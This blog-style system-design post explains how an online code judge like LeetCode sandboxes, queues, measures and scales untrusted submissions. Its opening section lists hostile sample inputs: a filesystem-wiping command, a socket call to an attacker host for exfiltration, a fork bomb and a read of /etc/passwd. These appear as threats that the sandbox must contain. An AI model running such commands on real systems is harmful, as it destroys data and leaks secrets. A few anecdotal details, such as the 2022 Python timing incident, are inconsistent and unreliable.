System Design: Online Code Judge — How LeetCode Runs Your Code Safely at Scale
LeetCode processes over
1 million code submissions
per day at peak contest
times. Running untrusted
code at that scale is
a hard security problem.
You get the question in the interview: “Design an online code judge like LeetCode.” Users submit Python, Java, C++, or JavaScript. The system compiles and runs their code against hidden test cases. It returns: Accepted, Wrong Answer, Time Limit Exceeded, Memory Limit Exceeded, or Runtime Error. And it must handle malicious code safely.
This post works through the problem from first principles — from naive process spawning all the way to production-grade container sandboxing, queue-based judging, and scaling to millions of submissions.
1. The core challenge: untrusted code execution
Running arbitrary user code is extremely dangerous. Consider what a malicious user could submit:
import os; os.system("rm -rf /")— destroy the filesystemwhile True: pass— infinite loop, CPU starvationx = [0] * (10**12)— allocate 8 TB, crash the machineimport socket; socket.connect(("attacker.com", 443))— exfiltrate dataimport os; os.fork()repeated — fork bomb, exhaust process tableopen("/etc/passwd", "r").read()— read host secrets
The system must be completely sandboxed: every submission runs in an isolated environment where it cannot harm the host system, other users, or the network.
2. Sandbox approaches (progressive)
🔒 Sandbox Level Explorer
Spawn the user's code as a child process with a timeout. Simple and fast — but extremely weak. The process still runs as a system user with access to the full filesystem and network.
Change the root directory for the process. The sandboxed process sees only a minimal directory tree — it cannot reach /etc, /home, or other host paths. Better, but shares the host kernel — a kernel exploit escapes the jail entirely.
Full Linux namespace isolation: filesystem, network, PID, user namespaces. Combined with cgroup resource limits. Each submission gets a fresh container that is destroyed after execution. This is production-viable for most judges.
--network none \
--memory 256m \
--cpus 0.5 \
--read-only \
--pids-limit 64 \
judge-runner:latest python3 solution.py
gVisor implements a Linux-compatible kernel in Go running entirely in userspace. Syscalls from the sandboxed process go to gVisor's kernel, not the host kernel — a kernel exploit only escapes into gVisor, which is isolated. Firecracker (used by AWS Lambda) boots a full microVM in ~125ms using KVM hardware virtualization. Maximum isolation at near-container overhead.
Sandbox in action
3. System architecture
The submission flows through seven stages before a verdict reaches the user.
🏗️ Submission Pipeline — click each stage
Payload:
{ "code": "...", "language": "python3", "problemId": 42, "userId": "u_abc" }
4. Test case execution
“Special judge” programs
are used when a problem
has multiple valid answers
— e.g. any valid graph
topological sort. The
special judge checks
correctness rather than
exact string equality.
For each test case the judge follows a strict loop:
function judgeSubmission(submission, testCases): results = [] for tc in testCases: container = spawnSandbox(submission.language) injectCode(container, submission.code) startTime = clock() startMem = cgroupMemUsage(container) proc = runInContainer(container, stdin=tc.input, timeout=tc.timeLimit) elapsed = clock() - startTime peakMem = cgroupPeakMem(container) - startMem exitCode = proc.exitCode stdout = proc.stdout destroyContainer(container) // always, even on crash if proc.timedOut: results.append({ status: "TLE", tc: tc.id }) elif peakMem > tc.memLimit: results.append({ status: "MLE", tc: tc.id }) elif exitCode != 0: results.append({ status: "RE", tc: tc.id, exitCode }) elif tc.specialJudge: ok = runSpecialJudge(tc, stdout) results.append({ status: ok ? "AC" : "WA", tc: tc.id }) elif normalize(stdout) != normalize(tc.expected): results.append({ status: "WA", tc: tc.id, got: stdout }) else: results.append({ status: "AC", tc: tc.id, time: elapsed, mem: peakMem }) if results.last.status != "AC": break // early exit on first failure return summarize(results)
Measuring resource usage accurately:
- Wall time: measured by the host using
clock_gettime(CLOCK_REALTIME)aroundwait4()— not self-reported by the process - CPU time: read from cgroup
cpuacct.usageafter execution — isolates pure compute time from I/O waits - Peak memory: read from cgroup
memory.max_usage_in_bytes— the high-water mark during the entire run - Output comparison: trim trailing whitespace, normalize line endings — many wrong answer bugs are whitespace issues
Special judges are separate programs that receive (input, expected_output, actual_output) and print OK or WRONG. Used for floating-point problems (accept output within 1e-6), multiple valid answers, or problems where the checker needs to verify a mathematical property.
5. Language-specific considerations
Python is 10–100× slower
than C++ for the same
algorithm. LeetCode gives
Python 5× more time than
C++ to make the judge
fair across languages.
Each language has unique sandboxing requirements and performance characteristics:
| Language | Time multiplier | Memory limit | Compilation | Key sandbox flags |
|---|---|---|---|---|
| C++ | 1× (baseline) | 256 MB | g++ -O2 -fsanitize=address,undefined | --read-only, seccomp profile |
| Java | 2× (JVM warmup) | 512 MB (JVM heap) | javac, then java -Xmx256m | SecurityManager, no exec() |
| Python | 5× (interpreter) | 256 MB | none (interpreted) | restrict os, subprocess, socket modules |
| JavaScript | 2× | 256 MB | none (Node.js) | --no-experimental-fetch, block fs.writeFile |
C++ — The most dangerous language to sandbox. Users can call system(), exec(), open arbitrary file descriptors. Mitigations:
- Compile with
-fsanitize=address,undefinedto catch memory errors early - Apply a seccomp (secure computing) filter to allow only specific syscalls:
read,write,exit, basic math — blockexecve,fork,socket - Strip the binary after compilation to remove debug symbols
Java — The JVM takes 200–300ms to warm up. Subtract this from the measured time. Use -Xmx256m -Xms32m to control heap. The JVM’s built-in SecurityManager (deprecated in Java 17, removed in 21 — use a custom ClassLoader restriction) can block file I/O and network calls.
Python — Restrict dangerous modules via a custom import hook or by deleting them from sys.modules. Running inside a Docker container with --read-only already prevents filesystem writes. The resource module can set RLIMIT_CPU and RLIMIT_AS from inside the process.
JavaScript (Node.js) — Node 18+ supports the --permission flag to disable filesystem write access and network. Older versions: override require('fs').writeFile and require('net').connect in a wrapper script loaded with --require.
6. Plagiarism detection
MOSS (Measure of Software
Similarity) was created at
Stanford in 1994 and is
still the gold standard
for academic plagiarism
detection. It uses
Winnowing fingerprinting.
Plagiarism detection runs asynchronously — it is not in the critical path of judging. After a submission is accepted, a background job compares it against other accepted solutions for the same problem.
Three approaches, increasing sophistication:
Token-based comparison — tokenize the code (strip variable names, map all identifiers to a canonical form), then compare token sequences using similarity metrics like Jaccard similarity or edit distance. Fast but fooled by variable renaming.
AST comparison — parse both programs to their Abstract Syntax Trees, then compare tree structure. Variable names are ignored. Reordering statements that are independent may fool this. Used by tools like JPlag.
MOSS fingerprinting — select representative substrings (k-grams) from the program using the Winnowing algorithm, hash them, compare hash sets across submissions. Robust to reformatting, variable renaming, and statement reordering. The classic choice.
- Submission accepted → enqueue plagiarism job (low priority queue)
- Normalize code: strip comments, whitespace, rename variables to
v1,v2... - Compute MOSS fingerprint
- Compare against top-50 accepted solutions (by runtime similarity)
- If similarity > 85% → flag for human review
- Human reviewer confirms or dismisses the flag
7. Scaling
Judge Worker pool — autoscale on queue depth:
The queue depth (number of pending jobs) is the primary scaling signal. With Kubernetes HPA and a custom metrics adapter:
- Queue depth > 50 → scale up workers
- Queue depth < 5 for 5 minutes → scale down
Each worker handles one submission at a time. At ~2s average execution time and 100 submissions/second, you need ~200 workers at steady state — with headroom to ~500 for contest bursts.
Warm container pool:
Cold-starting a Docker container takes 1–3 seconds (pulling layers, initializing the runtime). During peak load, this adds noticeable latency. Solution: maintain a pool of pre-started containers per language:
- Worker picks up a warm container instead of cold-starting
- Container is destroyed after one use (fresh container = no state leakage)
- A separate pool manager continuously refills the warm pool
Container reuse (for trusted languages):
For JavaScript with a locked-down runtime, the container can be reused across submissions. Between submissions: reset the sandbox directory, reload the Node.js process. ~50ms reset vs ~200ms cold start. Used only when the language runtime can be reliably reset.
class WarmPool: def __init__(self, language, target_size=10): self.language = language self.target_size = target_size self.pool = Queue() self._refill_loop() async def _refill_loop(self): while True: while self.pool.size() < self.target_size: c = await startContainer(self.language) self.pool.put(c) await sleep(100) // check every 100ms async def acquire(self): if self.pool.empty(): return await startContainer(self.language) // cold start fallback return self.pool.get() def release(self, container): destroyContainer(container) // never return to pool — single use
Geographic placement:
Judge workers should run in the same region as the users. A submission from a user in Singapore that is judged in Virginia has 150ms of network RTT added to the wait time — for a fast algorithm that finishes in 50ms, that is the dominant latency. Use CDN routing and regional worker deployments.
8. Interactive code judge demo
⚡ Mini Code Judge — try it
Problem: Given an array of integers, return their sum. Input: space-separated integers. Output: a single integer.
9. Capacity estimate
| Metric | Value |
|---|---|
| Submissions / day (LeetCode scale) | ~1 million |
| Peak submissions / second (contest) | ~100 / sec |
| Average execution time per submission | ~1–2 seconds |
| Judge workers needed (steady state) | ~200 |
| Judge workers needed (peak burst) | ~500 |
| Warm container pool size (per language) | ~50 containers |
| Container boot time (warm pool) | ~180–220 ms |
| Container boot time (cold start) | ~1.5–3 seconds |
| Code storage per submission (compressed) | ~5 KB avg |
| Total code storage per year | ~1.8 TB (1M/day × 365 × 5KB) |
| Result storage per submission | ~1 KB (verdict + per-test stats) |
| Total result storage per year | ~365 GB |
| Queue message size | ~2 KB (code + metadata) |
| Network bandwidth (queue + DB) | ~5 MB/s at peak |
Summary: system design checklist
| Sandbox | Docker with --network none, --memory, --read-only, --pids-limit + seccomp profile |
| Queue | Redis Streams or AWS SQS — durable, at-least-once delivery, dead-letter queue for failures |
| Result delivery | WebSocket push via Redis pub/sub; polling as fallback |
| Time measurement | Host-side wall clock + cgroup cpuacct.usage — never trust self-reported time |
| Memory measurement | cgroup memory.max_usage_in_bytes — peak high-water mark |
| Cold start latency | Pre-warm container pool of ~50 containers per language |
| Autoscaling | Kubernetes HPA on queue depth metric — scale up fast, scale down slow |
| Higher isolation | gVisor (runsc) for maximum security; Firecracker microVMs for VM-level isolation |
LeetCode runs on AWS.
Their judging infrastructure
uses a combination of ECS
(Elastic Container Service)
and custom-built judge
workers. The company
processes over 1 million
code submissions per day
at peak contest times.
LeetCode’s infrastructure runs on Amazon ECS. Their judge workers are custom-built containers that receive jobs from an internal queue. At peak contest times — when tens of thousands of participants submit simultaneously — the queue acts as a buffer, absorbing burst load that would overwhelm a synchronous system. The warm container pool keeps perceived latency low even when the queue is deep: you wait for a worker, but once a worker picks up your job, the container is ready immediately.
The 2022 LeetCode Weekly
Contest had a famous
incident: a Python solution
that should have TLE’d
was accepted because
Python 3.11 optimizations
made an O(n³) solution
fast enough. The community
debated the validity
for days.
The strictness of judging matters enormously for competitive programming. A 2022 incident: Python 3.11 introduced significant performance improvements (the “Faster CPython” project). Solutions that were accepted for years suddenly started failing after a Python version upgrade — and some O(n²) solutions that should have timed out started passing. Maintaining separate per-language time limits that account for interpreter version performance is a continuous maintenance burden.
gVisor (used by Google
Cloud Run and App Engine)
implements a Linux kernel
in Go running in userspace.
Syscalls from the sandboxed
process go to gVisor’s
kernel — even if the
process exploits a kernel
bug, it exploits gVisor,
not the host OS kernel.
gVisor’s approach is elegant: instead of letting user processes talk to the Linux kernel directly (with all its exploitable surface area), gVisor interposes a userspace kernel. Every syscall from the sandboxed process is handled by gVisor’s Sentry component, written in Go, which either handles it internally or translates it to a safe subset of host syscalls. The attack surface shrinks from the entire Linux kernel to gVisor’s much smaller, memory-safe Go implementation. Google Cloud Run and Cloud Functions run on gVisor — it is production-hardened at planetary scale.